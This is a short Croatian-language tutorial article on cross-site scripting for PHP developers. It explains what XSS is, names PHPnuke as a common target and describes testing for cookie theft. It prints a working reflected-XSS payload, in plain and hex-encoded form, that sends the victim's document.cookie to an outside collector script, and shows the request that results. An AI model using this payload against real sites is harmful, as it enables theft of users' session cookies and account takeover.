traži:  
 php.com.hr > članci > Cross Site Scripting

Cross Site Scripting
 
18.01.2005.


Cross site scripting poznat kao XSS, događa se kada web aplikacija zaprimi zlonamjerne podatke od nekog korisnika. Mnogi forumi i guestbook-ovi dopuštaju unos html-a.

Mnogima je pojam CSS poznat kao Cascading Style Sheet tako da ta kratica nije upotrebljena za pojam cross site scripting-a, već se upotrebljava XSS.

Potencijalni napadač će ubaciti JavaScript, VBScript, ActiveX, HTML ili flash u nezaštićenu aplikaciju da prevari korisnika.

Proizvod poznat po mnogim XSS propustima je svakako PHPnuke. Ta aplikacija je vrlo često bila metom napada, a napadačima je bila posebno zanimljiva upravo zbog svoje popularnosti.

Provjera XSS rupa:

Nakon što je pronađena XSS rupa u vašoj aplikaciji pokušajte saznati da li je moguće ishoditi cookie. Ako bilo koji dio site-a koristi cookie onda je i moguće da ih se ukrade od korisnika.


S obzirom da su XSS propusti različiti  ovisno kako su otkriveni neki testovi će trebati biti napravljeni kako bi se mogao izvršiti output.

Ubacujući kôd u skriptu output će biti promijenjen i stranica se može činiti nedostupna.

ASCII primjer :


http://host/a.php?variable="> <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>

HEX primjer:

 
http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e
%64%6f%63%75%6d%65%6e
%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74
%74%70%3a%2f%2f%77%77%77%2e%63%67
%69%73%65%63%75%72%69%74%79 %2e%63
%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f
%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63
%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63
%72%69%70%74%3e

 
Također i primjer korištenja "zlog" javascripta:


My cookie = user=zeno; id=021
My script = www.cgisecurity.com/cgi-bin/cookie.cgi

Šalje zahtjev site-u koji izgleda onda ovako:

GET /cgi-bin/cookie.cgi?user=zeno;%20id=021 (Napomena: %20 je HEX znak za razmak)
 

 
Opširnije na : http://www.cgisecurity.com

 


članci
 
 © 2004 - 2008 php.com.hr